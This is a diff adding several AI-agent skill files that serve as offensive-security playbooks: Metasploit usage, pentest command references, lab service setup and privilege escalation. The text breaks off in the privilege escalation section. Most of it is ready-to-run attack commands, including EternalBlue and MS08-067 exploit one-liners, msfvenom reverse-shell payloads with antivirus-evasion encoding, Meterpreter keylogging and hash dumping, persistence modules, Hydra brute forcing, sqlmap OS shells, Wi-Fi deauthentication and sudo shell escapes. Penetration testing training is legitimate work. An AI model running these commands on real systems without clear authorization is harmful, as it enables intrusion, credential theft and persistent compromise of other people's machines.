Metasploit Framework in security assessments. +--- + +# Metasploit Framework + +## Purpose + +Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments. + +## Prerequisites + +### Required Tools +```bash +# Metasploit comes pre-installed on Kali Linux +# For other systems: +curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall +chmod 755 msfinstall +./msfinstall + +# Start PostgreSQL for database support +sudo systemctl start postgresql +sudo msfdb init +``` + +### Required Knowledge +- Network and system fundamentals +- Understanding of vulnerabilities and exploits +- Basic programming concepts +- Target enumeration techniques + +### Required Access +- Written authorization for testing +- Network access to target systems +- Understanding of scope and rules of engagement + +## Outputs and Deliverables + +1. **Exploitation Evidence** - Screenshots and logs of successful compromises +2. **Session Logs** - Command history and extracted data +3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references +4. **Post-Exploitation Artifacts** - Credentials, files, and system information + +## Core Workflow + +### Phase 1: MSFConsole Basics + +Launch and navigate the Metasploit console: + +```bash +# Start msfconsole +msfconsole + +# Quiet mode (skip banner) +msfconsole -q + +# Basic navigation commands +msf6 > help # Show all commands +msf6 > search [term] # Search modules +msf6 > use [module] # Select module +msf6 > info # Show module details +msf6 > show options # Display required options +msf6 > set [OPTION] [value] # Configure option +msf6 > run / exploit # Execute module +msf6 > back # Return to main console +msf6 > exit # Exit msfconsole +``` + +### Phase 2: Module Types + +Understand the different module categories: + +```bash +# 1. Exploit Modules - Target specific vulnerabilities +msf6 > show exploits +msf6 > use exploit/windows/smb/ms17_010_eternalblue + +# 2. Payload Modules - Code executed after exploitation +msf6 > show payloads +msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp + +# 3. Auxiliary Modules - Scanning, fuzzing, enumeration +msf6 > show auxiliary +msf6 > use auxiliary/scanner/smb/smb_version + +# 4. Post-Exploitation Modules - Actions after compromise +msf6 > show post +msf6 > use post/windows/gather/hashdump + +# 5. Encoders - Obfuscate payloads +msf6 > show encoders +msf6 > set ENCODER x86/shikata_ga_nai + +# 6. Nops - No-operation padding for buffer overflows +msf6 > show nops + +# 7. Evasion - Bypass security controls +msf6 > show evasion +``` + +### Phase 3: Searching for Modules + +Find appropriate modules for targets: + +```bash +# Search by name +msf6 > search eternalblue + +# Search by CVE +msf6 > search cve:2017-0144 + +# Search by platform +msf6 > search platform:windows type:exploit + +# Search by type and keyword +msf6 > search type:auxiliary smb + +# Filter by rank (excellent, great, good, normal, average, low, manual) +msf6 > search rank:excellent + +# Combined search +msf6 > search type:exploit platform:linux apache + +# View search results columns: +# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description +``` + +### Phase 4: Configuring Exploits + +Set up an exploit for execution: + +```bash +# Select exploit module +msf6 > use exploit/windows/smb/ms17_010_eternalblue + +# View required options +msf6 exploit(windows/smb/ms17_010_eternalblue) > show options + +# Set target host +msf6 exploit(...) > set RHOSTS 192.168.1.100 + +# Set target port (if different from default) +msf6 exploit(...) > set RPORT 445 + +# View compatible payloads +msf6 exploit(...) > show payloads + +# Set payload +msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp + +# Set local host for reverse connection +msf6 exploit(...) > set LHOST 192.168.1.50 +msf6 exploit(...) > set LPORT 4444 + +# View all options again to verify +msf6 exploit(...) > show options + +# Check if target is vulnerable (if supported) +msf6 exploit(...) > check + +# Execute exploit +msf6 exploit(...) > exploit +# or +msf6 exploit(...) > run +``` + +### Phase 5: Payload Types + +Select appropriate payload for the situation: + +```bash +# Singles - Self-contained, no staging +windows/shell_reverse_tcp +linux/x86/shell_bind_tcp + +# Stagers - Small payload that downloads larger stage +windows/meterpreter/reverse_tcp +linux/x86/meterpreter/bind_tcp + +# Stages - Downloaded by stager, provides full functionality +# Meterpreter, VNC, shell + +# Payload naming convention: +# [platform]/[architecture]/[payload_type]/[connection_type] +# Examples: +windows/x64/meterpreter/reverse_tcp +linux/x86/shell/bind_tcp +php/meterpreter/reverse_tcp +java/meterpreter/reverse_https +android/meterpreter/reverse_tcp +``` + +### Phase 6: Meterpreter Session + +Work with Meterpreter post-exploitation: + +```bash +# After successful exploitation, you get Meterpreter prompt +meterpreter > + +# System Information +meterpreter > sysinfo +meterpreter > getuid +meterpreter > getpid + +# File System Operations +meterpreter > pwd +meterpreter > ls +meterpreter > cd C:\\Users +meterpreter > download file.txt /tmp/ +meterpreter > upload /tmp/tool.exe C:\\ + +# Process Management +meterpreter > ps +meterpreter > migrate [PID] +meterpreter > kill [PID] + +# Networking +meterpreter > ipconfig +meterpreter > netstat +meterpreter > route +meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1 + +# Privilege Escalation +meterpreter > getsystem +meterpreter > getprivs + +# Credential Harvesting +meterpreter > hashdump +meterpreter > run post/windows/gather/credentials/credential_collector + +# Screenshots and Keylogging +meterpreter > screenshot +meterpreter > keyscan_start +meterpreter > keyscan_dump +meterpreter > keyscan_stop + +# Shell Access +meterpreter > shell +C:\Windows\system32> whoami +C:\Windows\system32> exit +meterpreter > + +# Background Session +meterpreter > background +msf6 exploit(...) > sessions -l +msf6 exploit(...) > sessions -i 1 +``` + +### Phase 7: Auxiliary Modules + +Use auxiliary modules for reconnaissance: + +```bash +# SMB Version Scanner +msf6 > use auxiliary/scanner/smb/smb_version +msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24 +msf6 auxiliary(...) > run + +# Port Scanner +msf6 > use auxiliary/scanner/portscan/tcp +msf6 auxiliary(...) > set RHOSTS 192.168.1.100 +msf6 auxiliary(...) > set PORTS 1-1000 +msf6 auxiliary(...) > run + +# SSH Version Scanner +msf6 > use auxiliary/scanner/ssh/ssh_version +msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24 +msf6 auxiliary(...) > run + +# FTP Anonymous Login +msf6 > use auxiliary/scanner/ftp/anonymous +msf6 auxiliary(...) > set RHOSTS 192.168.1.100 +msf6 auxiliary(...) > run + +# HTTP Directory Scanner +msf6 > use auxiliary/scanner/http/dir_scanner +msf6 auxiliary(...) > set RHOSTS 192.168.1.100 +msf6 auxiliary(...) > run + +# Brute Force Modules +msf6 > use auxiliary/scanner/ssh/ssh_login +msf6 auxiliary(...) > set RHOSTS 192.168.1.100 +msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt +msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt +msf6 auxiliary(...) > run +``` + +### Phase 8: Post-Exploitation Modules + +Run post modules on active sessions: + +```bash +# List sessions +msf6 > sessions -l + +# Run post module on specific session +msf6 > use post/windows/gather/hashdump +msf6 post(windows/gather/hashdump) > set SESSION 1 +msf6 post(...) > run + +# Or run directly from Meterpreter +meterpreter > run post/windows/gather/hashdump + +# Common Post Modules +# Credential Gathering +post/windows/gather/credentials/credential_collector +post/windows/gather/lsa_secrets +post/windows/gather/cachedump +post/multi/gather/ssh_creds + +# System Enumeration +post/windows/gather/enum_applications +post/windows/gather/enum_logged_on_users +post/windows/gather/enum_shares +post/linux/gather/enum_configs + +# Privilege Escalation +post/windows/escalate/getsystem +post/multi/recon/local_exploit_suggester + +# Persistence +post/windows/manage/persistence_exe +post/linux/manage/sshkey_persistence + +# Pivoting +post/multi/manage/autoroute +``` + +### Phase 9: Payload Generation with msfvenom + +Create standalone payloads: + +```bash +# Basic Windows reverse shell +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe + +# Linux reverse shell +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf + +# PHP reverse shell +msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php + +# Python reverse shell +msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py + +# PowerShell payload +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1 + +# ASP web shell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp + +# WAR file (Tomcat) +msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war + +# Android APK +msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk + +# Encoded payload (evade AV) +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe + +# List available formats +msfvenom --list formats + +# List available encoders +msfvenom --list encoders +``` + +### Phase 10: Setting Up Handlers + +Configure listener for incoming connections: + +```bash +# Manual handler setup +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/handler) > set LHOST 192.168.1.50 +msf6 exploit(multi/handler) > set LPORT 4444 +msf6 exploit(multi/handler) > exploit -j + +# The -j flag runs as background job +msf6 > jobs -l + +# When payload executes on target, session opens +[*] Meterpreter session 1 opened + +# Interact with session +msf6 > sessions -i 1 +``` + +## Quick Reference + +### Essential MSFConsole Commands + +| Command | Description | +|---------|-------------| +| `search [term]` | Search for modules | +| `use [module]` | Select a module | +| `info` | Display module information | +| `show options` | Show configurable options | +| `set [OPT] [val]` | Set option value | +| `setg [OPT] [val]` | Set global option | +| `run` / `exploit` | Execute module | +| `check` | Verify target vulnerability | +| `back` | Deselect module | +| `sessions -l` | List active sessions | +| `sessions -i [N]` | Interact with session | +| `jobs -l` | List background jobs | +| `db_nmap` | Run nmap with database | + +### Meterpreter Essential Commands + +| Command | Description | +|---------|-------------| +| `sysinfo` | System information | +| `getuid` | Current user | +| `getsystem` | Attempt privilege escalation | +| `hashdump` | Dump password hashes | +| `shell` | Drop to system shell | +| `upload/download` | File transfer | +| `screenshot` | Capture screen | +| `keyscan_start` | Start keylogger | +| `migrate [PID]` | Move to another process | +| `background` | Background session | +| `portfwd` | Port forwarding | + +### Common Exploit Modules + +```bash +# Windows +exploit/windows/smb/ms17_010_eternalblue +exploit/windows/smb/ms08_067_netapi +exploit/windows/http/iis_webdav_upload_asp +exploit/windows/local/bypassuac + +# Linux +exploit/linux/ssh/sshexec +exploit/linux/local/overlayfs_priv_esc +exploit/multi/http/apache_mod_cgi_bash_env_exec + +# Web Applications +exploit/multi/http/tomcat_mgr_upload +exploit/unix/webapp/wp_admin_shell_upload +exploit/multi/http/jenkins_script_console +``` + +## Constraints and Limitations + +### Legal Requirements +- Only use on systems you own or have written authorization to test +- Document all testing activities +- Follow rules of engagement +- Report all findings to appropriate parties + +### Technical Limitations +- Modern AV/EDR may detect Metasploit payloads +- Some exploits require specific target configurations +- Firewall rules may block reverse connections +- Not all exploits work on all target versions + +### Operational Security +- Use encrypted channels (reverse_https) when possible +- Clean up artifacts after testing +- Avoid detection by monitoring systems +- Limit post-exploitation to agreed scope + +## Troubleshooting + +| Issue | Solutions | +|-------|-----------| +| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` | +| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads | +| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript | +| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates | diff --git a/skills/network-101/SKILL.md b/skills/network-101/SKILL.md new file mode 100644 index 00000000..357f979a --- /dev/null +++ b/skills/network-101/SKILL.md @@ -0,0 +1,339 @@ +--- +name: Network 101 +description: This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. +--- + +# Network 101 + +## Purpose + +Configure and test common network services (HTTP, HTTPS, SNMP, SMB) for penetration testing lab environments. Enable hands-on practice with service enumeration, log analysis, and security testing against properly configured target systems. + +## Inputs/Prerequisites + +- Windows Server or Linux system for hosting services +- Kali Linux or similar for testing +- Administrative access to target system +- Basic networking knowledge (IP addressing, ports) +- Firewall access for port configuration + +## Outputs/Deliverables + +- Configured HTTP/HTTPS web server +- SNMP service with accessible communities +- SMB file shares with various permission levels +- Captured logs for analysis +- Documented enumeration results + +## Core Workflow + +### 1. Configure HTTP Server (Port 80) + +Set up a basic HTTP web server for testing: + +**Windows IIS Setup:** +1. Open IIS Manager (Internet Information Services) +2. Right-click Sites → Add Website +3. Configure site name and physical path +4. Bind to IP address and port 80 + +**Linux Apache Setup:** + +```bash +# Install Apache +sudo apt update && sudo apt install apache2 + +# Start service +sudo systemctl start apache2 +sudo systemctl enable apache2 + +# Create test page +echo "

Test Page

" | sudo tee /var/www/html/index.html + +# Verify service +curl http://localhost +``` + +**Configure Firewall for HTTP:** + +```bash +# Linux (UFW) +sudo ufw allow 80/tcp + +# Windows PowerShell +New-NetFirewallRule -DisplayName "HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow +``` + +### 2. Configure HTTPS Server (Port 443) + +Set up secure HTTPS with SSL/TLS: + +**Generate Self-Signed Certificate:** + +```bash +# Linux - Generate certificate +sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ + -keyout /etc/ssl/private/apache-selfsigned.key \ + -out /etc/ssl/certs/apache-selfsigned.crt + +# Enable SSL module +sudo a2enmod ssl +sudo systemctl restart apache2 +``` + +**Configure Apache for HTTPS:** + +```bash +# Edit SSL virtual host +sudo nano /etc/apache2/sites-available/default-ssl.conf + +# Enable site +sudo a2ensite default-ssl +sudo systemctl reload apache2 +``` + +**Verify HTTPS Setup:** + +```bash +# Check port 443 is open +nmap -p 443 192.168.1.1 + +# Test SSL connection +openssl s_client -connect 192.168.1.1:443 + +# Check certificate +curl -kv https://192.168.1.1 +``` + +### 3. Configure SNMP Service (Port 161) + +Set up SNMP for enumeration practice: + +**Linux SNMP Setup:** + +```bash +# Install SNMP daemon +sudo apt install snmpd snmp + +# Configure community strings +sudo nano /etc/snmp/snmpd.conf + +# Add these lines: +# rocommunity public +# rwcommunity private + +# Restart service +sudo systemctl restart snmpd +``` + +**Windows SNMP Setup:** +1. Open Server Manager → Add Features +2. Select SNMP Service +3. Configure community strings in Services → SNMP Service → Properties + +**SNMP Enumeration Commands:** + +```bash +# Basic SNMP walk +snmpwalk -c public -v1 192.168.1.1 + +# Enumerate system info +snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.1 + +# Get running processes +snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2 + +# SNMP check tool +snmp-check 192.168.1.1 -c public + +# Brute force community strings +onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1 +``` + +### 4. Configure SMB Service (Port 445) + +Set up SMB file shares for enumeration: + +**Windows SMB Share:** +1. Create folder to share +2. Right-click → Properties → Sharing → Advanced Sharing +3. Enable sharing and set permissions +4. Configure NTFS permissions + +**Linux Samba Setup:** + +```bash +# Install Samba +sudo apt install samba + +# Create share directory +sudo mkdir -p /srv/samba/share +sudo chmod 777 /srv/samba/share + +# Configure Samba +sudo nano /etc/samba/smb.conf + +# Add share: +# [public] +# path = /srv/samba/share +# browsable = yes +# guest ok = yes +# read only = no + +# Restart service +sudo systemctl restart smbd +``` + +**SMB Enumeration Commands:** + +```bash +# List shares anonymously +smbclient -L //192.168.1.1 -N + +# Connect to share +smbclient //192.168.1.1/share -N + +# Enumerate with smbmap +smbmap -H 192.168.1.1 + +# Full enumeration +enum4linux -a 192.168.1.1 + +# Check for vulnerabilities +nmap --script smb-vuln* 192.168.1.1 +``` + +### 5. Analyze Service Logs + +Review logs for security analysis: + +**HTTP/HTTPS Logs:** + +```bash +# Apache access log +sudo tail -f /var/log/apache2/access.log + +# Apache error log +sudo tail -f /var/log/apache2/error.log + +# Windows IIS logs +# Location: C:\inetpub\logs\LogFiles\W3SVC1\ +``` + +**Parse Log for Credentials:** + +```bash +# Search for POST requests +grep "POST" /var/log/apache2/access.log + +# Extract user agents +awk '{print $12}' /var/log/apache2/access.log | sort | uniq -c +``` + +## Quick Reference + +### Essential Ports + +| Service | Port | Protocol | +|---------|------|----------| +| HTTP | 80 | TCP | +| HTTPS | 443 | TCP | +| SNMP | 161 | UDP | +| SMB | 445 | TCP | +| NetBIOS | 137-139 | TCP/UDP | + +### Service Verification Commands + +```bash +# Check HTTP +curl -I http://target + +# Check HTTPS +curl -kI https://target + +# Check SNMP +snmpwalk -c public -v1 target + +# Check SMB +smbclient -L //target -N +``` + +### Common Enumeration Tools + +| Tool | Purpose | +|------|---------| +| nmap | Port scanning and scripts | +| nikto | Web vulnerability scanning | +| snmpwalk | SNMP enumeration | +| enum4linux | SMB/NetBIOS enumeration | +| smbclient | SMB connection | +| gobuster | Directory brute forcing | + +## Constraints + +- Self-signed certificates trigger browser warnings +- SNMP v1/v2c communities transmit in cleartext +- Anonymous SMB access is often disabled by default +- Firewall rules must allow inbound connections +- Lab environments should be isolated from production + +## Examples + +### Example 1: Complete HTTP Lab Setup + +```bash +# Install and configure +sudo apt install apache2 +sudo systemctl start apache2 + +# Create login page +cat << 'EOF' | sudo tee /var/www/html/login.html + + + +Username:
+Password:
+ + + + +EOF + +# Allow through firewall +sudo ufw allow 80/tcp +``` + +### Example 2: SNMP Testing Setup + +```bash +# Quick SNMP configuration +sudo apt install snmpd +echo "rocommunity public" | sudo tee -a /etc/snmp/snmpd.conf +sudo systemctl restart snmpd + +# Test enumeration +snmpwalk -c public -v1 localhost +``` + +### Example 3: SMB Anonymous Access + +```bash +# Configure anonymous share +sudo apt install samba +sudo mkdir /srv/samba/anonymous +sudo chmod 777 /srv/samba/anonymous + +# Test access +smbclient //localhost/anonymous -N +``` + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Port not accessible | Check firewall rules (ufw, iptables, Windows Firewall) | +| Service not starting | Check logs with `journalctl -u service-name` | +| SNMP timeout | Verify UDP 161 is open, check community string | +| SMB access denied | Verify share permissions and user credentials | +| HTTPS certificate error | Accept self-signed cert or add to trusted store | +| Cannot connect remotely | Bind service to 0.0.0.0 instead of localhost | diff --git a/skills/pentest-commands/SKILL.md b/skills/pentest-commands/SKILL.md new file mode 100644 index 00000000..da2b5f4a --- /dev/null +++ b/skills/pentest-commands/SKILL.md @@ -0,0 +1,435 @@ +--- +name: Pentest Commands +description: This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. +--- + +# Pentest Commands + +## Purpose + +Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments. + +## Inputs/Prerequisites + +- Kali Linux or penetration testing distribution +- Target IP addresses with authorization +- Wordlists for brute forcing +- Network access to target systems +- Basic understanding of tool syntax + +## Outputs/Deliverables + +- Network enumeration results +- Identified vulnerabilities +- Exploitation payloads +- Cracked credentials +- Web vulnerability findings + +## Core Workflow + +### 1. Nmap Commands + +**Host Discovery:** + +```bash +# Ping sweep +nmap -sP 192.168.1.0/24 + +# List IPs without scanning +nmap -sL 192.168.1.0/24 + +# Ping scan (host discovery) +nmap -sn 192.168.1.0/24 +``` + +**Port Scanning:** + +```bash +# TCP SYN scan (stealth) +nmap -sS 192.168.1.1 + +# Full TCP connect scan +nmap -sT 192.168.1.1 + +# UDP scan +nmap -sU 192.168.1.1 + +# All ports (1-65535) +nmap -p- 192.168.1.1 + +# Specific ports +nmap -p 22,80,443 192.168.1.1 +``` + +**Service Detection:** + +```bash +# Service versions +nmap -sV 192.168.1.1 + +# OS detection +nmap -O 192.168.1.1 + +# Comprehensive scan +nmap -A 192.168.1.1 + +# Skip host discovery +nmap -Pn 192.168.1.1 +``` + +**NSE Scripts:** + +```bash +# Vulnerability scan +nmap --script vuln 192.168.1.1 + +# SMB enumeration +nmap --script smb-enum-shares -p 445 192.168.1.1 + +# HTTP enumeration +nmap --script http-enum -p 80 192.168.1.1 + +# Check EternalBlue +nmap --script smb-vuln-ms17-010 192.168.1.1 + +# Check MS08-067 +nmap --script smb-vuln-ms08-067 192.168.1.1 + +# SSH brute force +nmap --script ssh-brute -p 22 192.168.1.1 + +# FTP anonymous +nmap --script ftp-anon 192.168.1.1 + +# DNS brute force +nmap --script dns-brute 192.168.1.1 + +# HTTP methods +nmap -p80 --script http-methods 192.168.1.1 + +# HTTP headers +nmap -p80 --script http-headers 192.168.1.1 + +# SQL injection check +nmap --script http-sql-injection -p 80 192.168.1.1 +``` + +**Advanced Scans:** + +```bash +# Xmas scan +nmap -sX 192.168.1.1 + +# ACK scan (firewall detection) +nmap -sA 192.168.1.1 + +# Window scan +nmap -sW 192.168.1.1 + +# Traceroute +nmap --traceroute 192.168.1.1 +``` + +### 2. Metasploit Commands + +**Basic Usage:** + +```bash +# Launch Metasploit +msfconsole + +# Search for exploits +search type:exploit name:smb + +# Use exploit +use exploit/windows/smb/ms17_010_eternalblue + +# Show options +show options + +# Set target +set RHOST 192.168.1.1 + +# Set payload +set PAYLOAD windows/meterpreter/reverse_tcp + +# Run exploit +exploit +``` + +**Common Exploits:** + +```bash +# EternalBlue +msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit" + +# MS08-067 (Conficker) +msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit" + +# vsftpd backdoor +msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit" + +# Shellshock +msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit" + +# Drupalgeddon2 +msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit" + +# PSExec +msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit" +``` + +**Scanners:** + +```bash +# TCP port scan +msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run" + +# SMB version scan +msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run" + +# SMB share enumeration +msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run" + +# SSH brute force +msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run" + +# FTP brute force +msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run" + +# RDP scanning +msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run" +``` + +**Handler Setup:** + +```bash +# Multi-handler for reverse shells +msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit" +``` + +**Payload Generation (msfvenom):** + +```bash +# Windows reverse shell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe + +# Linux reverse shell +msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf + +# PHP reverse shell +msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php + +# ASP reverse shell +msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp + +# WAR file +msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war + +# Python payload +msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py +``` + +### 3. Nikto Commands + +```bash +# Basic scan +nikto -h http://192.168.1.1 + +# Comprehensive scan +nikto -h http://192.168.1.1 -C all + +# Output to file +nikto -h http://192.168.1.1 -output report.html + +# Plugin-based scans +nikto -h http://192.168.1.1 -Plugins robots +nikto -h http://192.168.1.1 -Plugins shellshock +nikto -h http://192.168.1.1 -Plugins heartbleed +nikto -h http://192.168.1.1 -Plugins ssl + +# Export to Metasploit +nikto -h http://192.168.1.1 -Format msf+ + +# Specific tuning +nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only +``` + +### 4. SQLMap Commands + +```bash +# Basic injection test +sqlmap -u "http://192.168.1.1/page?id=1" + +# Enumerate databases +sqlmap -u "http://192.168.1.1/page?id=1" --dbs + +# Enumerate tables +sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables + +# Dump table +sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump + +# OS shell +sqlmap -u "http://192.168.1.1/page?id=1" --os-shell + +# POST request +sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test" + +# Cookie injection +sqlmap -u "http://192.168.1.1/page" --cookie="id=1*" + +# Bypass WAF +sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment + +# Risk and level +sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5 +``` + +### 5. Hydra Commands + +```bash +# SSH brute force +hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 + +# FTP brute force +hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1 + +# HTTP POST form +hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" + +# HTTP Basic Auth +hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/ + +# SMB brute force +hydra -l admin -P passwords.txt smb://192.168.1.1 + +# RDP brute force +hydra -l admin -P passwords.txt rdp://192.168.1.1 + +# MySQL brute force +hydra -l root -P passwords.txt mysql://192.168.1.1 + +# Username list +hydra -L users.txt -P passwords.txt ssh://192.168.1.1 +``` + +### 6. John the Ripper Commands + +```bash +# Crack password file +john hash.txt + +# Specify wordlist +john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# Show cracked passwords +john hash.txt --show + +# Specify format +john hash.txt --format=raw-md5 +john hash.txt --format=nt +john hash.txt --format=sha512crypt + +# SSH key passphrase +ssh2john id_rsa > ssh_hash.txt +john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# ZIP password +zip2john file.zip > zip_hash.txt +john zip_hash.txt +``` + +### 7. Aircrack-ng Commands + +```bash +# Monitor mode +airmon-ng start wlan0 + +# Capture packets +airodump-ng wlan0mon + +# Target specific network +airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon + +# Deauth attack +aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon + +# Crack WPA handshake +aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap +``` + +### 8. Wireshark/Tshark Commands + +```bash +# Capture traffic +tshark -i eth0 -w capture.pcap + +# Read capture file +tshark -r capture.pcap + +# Filter by protocol +tshark -r capture.pcap -Y "http" + +# Filter by IP +tshark -r capture.pcap -Y "ip.addr == 192.168.1.1" + +# Extract HTTP data +tshark -r capture.pcap -Y "http" -T fields -e http.request.uri +``` + +## Quick Reference + +### Common Port Scans + +```bash +# Quick scan +nmap -F 192.168.1.1 + +# Full comprehensive +nmap -sV -sC -A -p- 192.168.1.1 + +# Fast with version +nmap -sV -T4 192.168.1.1 +``` + +### Password Hash Types + +| Mode | Type | +|------|------| +| 0 | MD5 | +| 100 | SHA1 | +| 1000 | NTLM | +| 1800 | sha512crypt | +| 3200 | bcrypt | +| 13100 | Kerberoast | + +## Constraints + +- Always have written authorization +- Some scans are noisy and detectable +- Brute forcing may lock accounts +- Rate limiting affects tools + +## Examples + +### Example 1: Quick Vulnerability Scan + +```bash +nmap -sV --script vuln 192.168.1.1 +``` + +### Example 2: Web App Test + +```bash +nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs +``` + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Scan too slow | Increase timing (-T4, -T5) | +| Ports filtered | Try different scan types | +| Exploit fails | Check target version compatibility | +| Passwords not cracking | Try larger wordlists, rules | diff --git a/skills/privilege-escalation-methods/SKILL.md b/skills/privilege-escalation-methods/SKILL.md new file mode 100644 index 00000000..1f8a3579 --- /dev/null +++ b/skills/privilege-escalation-methods/SKILL.md @@ -0,0 +1,330 @@ +--- +name: Privilege Escalation Methods +description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. +--- + +# Privilege Escalation Methods + +## Purpose + +Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations. + +## Inputs/Prerequisites + +- Initial low-privilege shell access on target system +- Kali Linux or penetration testing distribution +- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus +- Understanding of Windows/Linux privilege models +- For AD attacks: Domain user credentials and network access to DC + +## Outputs/Deliverables + +- Root or Administrator shell access +- Extracted credentials and hashes +- Persistent access mechanisms +- Domain compromise (for AD environments) + +--- + +## Core Techniques + +### Linux Privilege Escalation + +#### 1. Abusing Sudo Binaries + +Exploit misconfigured sudo permissions using GTFOBins techniques: + +```bash +# Check sudo permissions +sudo -l + +# Exploit common binaries +sudo vim -c ':!/bin/bash' +sudo find /etc/passwd -exec /bin/bash \; +sudo awk 'BEGIN {system("/bin/bash")}' +sudo python -c 'import pty;pty.spawn("/bin/bash")' +sudo perl -e 'exec "/bin/bash";' 